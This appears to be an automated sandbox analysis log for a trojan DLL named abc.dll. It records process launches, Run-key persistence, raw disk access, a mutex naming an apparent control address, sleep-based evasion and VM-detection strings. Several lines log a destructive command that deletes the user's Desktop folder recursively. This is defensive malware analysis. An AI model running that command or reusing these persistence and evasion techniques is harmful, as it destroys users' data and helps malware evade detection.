Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\abc.dll",InputFile
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\abc.dll",PrintFile
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 732
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\abc.dll",Dispatch
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\abc.dll",Dispatch
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\abc.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,DispatchJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,InputFileJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,PrintFileJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\abc.dll",DispatchJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\abc.dll",InputFileJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\abc.dll",PrintFileJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\abc.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100042A2 LookupPrivilegeValueA,AdjustTokenPrivileges,4_2_100042A2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000404F AdjustTokenPrivileges,4_2_1000404F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1000404F AdjustTokenPrivileges,12_2_1000404F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_1000404F AdjustTokenPrivileges,18_2_1000404F
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\Desktop\12071239Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER8259.tmpJump to behavior
Source: classification engineClassification label: mal100.troj.evad.winDLL@41/11@54/7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10003FB7 CreateToolhelp32Snapshot,4_2_10003FB7
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,Dispatch
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3440:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1844:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\107.163.56.251:6658
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2224:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\0x5d65r455f
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4912
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\M107.163.56.251:6658
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:468:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4620
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0137E433 pushad ; ret 1_2_0137E44C
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0137CF30 push eax; iretd 1_2_0137CF35
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0137C8F8 pushad ; iretd 1_2_0137C8F9
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0137C8C2 push eax; iretd 1_2_0137C8E9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1003EEEF pushfd ; mov dword ptr [esp], 17E8F454h4_2_1003EEFE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002D004 push dword ptr [esp+50h]; retn 0054h4_2_1002D01E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002D021 push dword ptr [esp+38h]; retn 0040h4_2_1002D038
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002D02C push dword ptr [esp+38h]; retn 0040h4_2_1002D038
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10039035 push dword ptr [esp+2Ch]; retn 0030h4_2_1003904E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10027057 push dword ptr [esp+38h]; retn 003Ch4_2_1003BC33
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002F059 push dword ptr [esp+48h]; retn 004Ch4_2_1002F06E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10043069 pushad ; mov dword ptr [esp], ebx4_2_1003825D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1003F072 push dword ptr [esp+2Ch]; retn 0034h4_2_1003F07B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10029075 push dword ptr [esp+40h]; retn 0044h4_2_10032078
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002B08E push dword ptr [esp+4Ch]; retn 0050h4_2_1002B0C9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001F093 pushfd ; mov dword ptr [esp], ecx4_2_1001F097
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1003B095 push dword ptr [esp+30h]; retn 0034h4_2_1003B0B2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002709C push dword ptr [esp+44h]; retn 004Ch4_2_100410EA
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100210BB push ebx; mov dword ptr [esp], esi4_2_100210D1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100210BB push dword ptr [esp+28h]; retn 002Ch4_2_100210FD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100210BB push dword ptr [esp+44h]; retn 0048h4_2_10031D0F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100250BC push dword ptr [esp+4Ch]; retn 0050h4_2_100250E1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100270CC push dword ptr [esp+24h]; retn 0028h4_2_1002B355
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100390CD push esp; mov dword ptr [esp], esp4_2_100390E2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002B0D0 push dword ptr [esp+40h]; retn 0044h4_2_10032078
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002B0D0 push dword ptr [esp+30h]; retn 0034h4_2_10037F52
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100230E0 push dword ptr [esp]; mov dword ptr [esp], ECCABD13h4_2_1002310C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100230E0 push dword ptr [esp+4Ch]; retn 0050h4_2_10023118
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100290F2 push dword ptr [esp+40h]; retn 0044h4_2_10029117
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10041100 push dword ptr [esp+38h]; retn 003Ch4_2_10041123
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002110B push dword ptr [esp+44h]; retn 0048h4_2_1002112D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_026E0E83 LoadLibraryA,GetProcAddress,4_2_026E0E83
Source: initial sampleStatic PE information: section where entry point is pointing to: .rsrc
Source: abc.dllStatic PE information: real checksum: 0x3d1e7 should be: 0x397f3
Source: initial sampleStatic PE information: section name: .text entropy: 7.99891570226

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\rundll32.exeCode function: DeviceIoControl, \\.\PHYSICALDRIVE%d4_2_10008B8B

Boot Survival

barindex
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DispJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: DeviceIoControl, \\.\PHYSICALDRIVE%d4_2_10008B8B
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DispJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DispJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_4-17086
Source: C:\Windows\SysWOW64\rundll32.exeStalling execution: Execution stalls by calling Sleepgraph_4-16695
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 502Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 536Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 5.1 %
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 5.1 %
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10007F89 FindFirstFileA,FindNextFileA,4_2_10007F89
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_4-17028
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_4-16997
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_5-346
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_5-385
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_12-16377
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_16-360
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_16-346
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_18-16375
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\microsoft.system.package.metadata\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\WindowsApps\Deleted\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\AppTiles\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\Jump to behavior
Source: Amcache.hve.15.drBinary or memory string: VMware
Source: Amcache.hve.15.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: rundll32.exe, 00000004.00000002.772606981.000000000029B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: s\Applications\\VMwareHo
Source: Amcache.hve.15.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.15.drBinary or memory string: VMware Virtual USB Mouse
Source: rundll32.exe, 00000004.00000003.312083245.0000000002707000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y\Machine\Software\Classes\Applications\\VMwareHostOpen.exes\Applications\\VMwareHostOpen.exeion\\Run\User Shell Foldersockdown_Zones\4
Source: Amcache.hve.15.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.15.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: rundll32.exe, 00000004.00000002.773257908.00000000028E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW4
Source: Amcache.hve.15.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.15.drBinary or memory string: VMware7,1
Source: Amcache.hve.15.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.15.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.15.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: rundll32.exe, 00000004.00000002.773257908.00000000028E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.15.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.15.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
